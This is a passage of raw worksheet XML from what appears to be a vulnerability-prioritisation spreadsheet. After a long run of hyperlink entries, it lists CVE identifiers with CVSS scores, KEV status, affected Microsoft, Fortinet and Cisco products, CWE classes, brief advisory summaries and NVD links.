    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1309" r:id="rId1308"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1310" r:id="rId1309"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1311" r:id="rId1310"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1312" r:id="rId1311"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1313" r:id="rId1312"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1314" r:id="rId1313"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1315" r:id="rId1314"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1316" r:id="rId1315"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1317" r:id="rId1316"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1318" r:id="rId1317"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1319" r:id="rId1318"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1320" r:id="rId1319"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1321" r:id="rId1320"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1322" r:id="rId1321"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1323" r:id="rId1322"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1324" r:id="rId1323"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1325" r:id="rId1324"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1326" r:id="rId1325"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1327" r:id="rId1326"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1328" r:id="rId1327"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1329" r:id="rId1328"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1330" r:id="rId1329"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1331" r:id="rId1330"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1332" r:id="rId1331"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1333" r:id="rId1332"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1334" r:id="rId1333"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1335" r:id="rId1334"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1336" r:id="rId1335"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1337" r:id="rId1336"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1338" r:id="rId1337"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1339" r:id="rId1338"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1340" r:id="rId1339"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1341" r:id="rId1340"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1342" r:id="rId1341"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1343" r:id="rId1342"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1344" r:id="rId1343"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1345" r:id="rId1344"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1346" r:id="rId1345"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1347" r:id="rId1346"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1348" r:id="rId1347"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1349" r:id="rId1348"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1350" r:id="rId1349"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1351" r:id="rId1350"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1352" r:id="rId1351"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1353" r:id="rId1352"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1354" r:id="rId1353"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1355" r:id="rId1354"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1356" r:id="rId1355"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1357" r:id="rId1356"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1358" r:id="rId1357"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1359" r:id="rId1358"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1360" r:id="rId1359"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1361" r:id="rId1360"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1362" r:id="rId1361"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1363" r:id="rId1362"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1364" r:id="rId1363"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1365" r:id="rId1364"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1366" r:id="rId1365"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1367" r:id="rId1366"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1368" r:id="rId1367"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1369" r:id="rId1368"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1370" r:id="rId1369"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1371" r:id="rId1370"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1372" r:id="rId1371"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1373" r:id="rId1372"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1374" r:id="rId1373"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1375" r:id="rId1374"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1376" r:id="rId1375"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1377" r:id="rId1376"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1378" r:id="rId1377"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1379" r:id="rId1378"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1380" r:id="rId1379"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1381" r:id="rId1380"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1382" r:id="rId1381"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1383" r:id="rId1382"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1384" r:id="rId1383"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1385" r:id="rId1384"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1386" r:id="rId1385"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1387" r:id="rId1386"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1388" r:id="rId1387"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1389" r:id="rId1388"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1390" r:id="rId1389"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1391" r:id="rId1390"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1392" r:id="rId1391"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1393" r:id="rId1392"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1394" r:id="rId1393"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1395" r:id="rId1394"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1396" r:id="rId1395"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1397" r:id="rId1396"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1398" r:id="rId1397"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1399" r:id="rId1398"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1400" r:id="rId1399"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1401" r:id="rId1400"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1402" r:id="rId1401"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1403" r:id="rId1402"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1404" r:id="rId1403"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1405" r:id="rId1404"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1406" r:id="rId1405"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1407" r:id="rId1406"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1408" r:id="rId1407"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1409" r:id="rId1408"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1410" r:id="rId1409"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1411" r:id="rId1410"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1412" r:id="rId1411"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1413" r:id="rId1412"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1414" r:id="rId1413"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1415" r:id="rId1414"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1416" r:id="rId1415"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1417" r:id="rId1416"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1418" r:id="rId1417"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1419" r:id="rId1418"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1420" r:id="rId1419"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1421" r:id="rId1420"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1422" r:id="rId1421"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1423" r:id="rId1422"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1424" r:id="rId1423"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1425" r:id="rId1424"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1426" r:id="rId1425"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1427" r:id="rId1426"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1428" r:id="rId1427"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1429" r:id="rId1428"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1430" r:id="rId1429"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1431" r:id="rId1430"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1432" r:id="rId1431"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1433" r:id="rId1432"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1434" r:id="rId1433"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1435" r:id="rId1434"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1436" r:id="rId1435"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1437" r:id="rId1436"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1438" r:id="rId1437"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1439" r:id="rId1438"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1440" r:id="rId1439"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1441" r:id="rId1440"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1442" r:id="rId1441"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1443" r:id="rId1442"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1444" r:id="rId1443"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1445" r:id="rId1444"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1446" r:id="rId1445"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1447" r:id="rId1446"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1448" r:id="rId1447"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1449" r:id="rId1448"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1450" r:id="rId1449"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1451" r:id="rId1450"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1452" r:id="rId1451"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1453" r:id="rId1452"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1454" r:id="rId1453"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1455" r:id="rId1454"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1456" r:id="rId1455"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1457" r:id="rId1456"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1458" r:id="rId1457"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1459" r:id="rId1458"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1460" r:id="rId1459"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1461" r:id="rId1460"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1462" r:id="rId1461"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1463" r:id="rId1462"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1464" r:id="rId1463"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1465" r:id="rId1464"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1466" r:id="rId1465"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1467" r:id="rId1466"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1468" r:id="rId1467"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1469" r:id="rId1468"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1470" r:id="rId1469"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1471" r:id="rId1470"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1472" r:id="rId1471"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1473" r:id="rId1472"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1474" r:id="rId1473"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1475" r:id="rId1474"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1476" r:id="rId1475"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1477" r:id="rId1476"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1478" r:id="rId1477"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1479" r:id="rId1478"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1480" r:id="rId1479"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1481" r:id="rId1480"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1482" r:id="rId1481"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1483" r:id="rId1482"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1484" r:id="rId1483"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1485" r:id="rId1484"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1486" r:id="rId1485"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1487" r:id="rId1486"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1488" r:id="rId14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48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CVE-2026-81963</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</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is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="S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is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R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S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is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R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S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R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7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
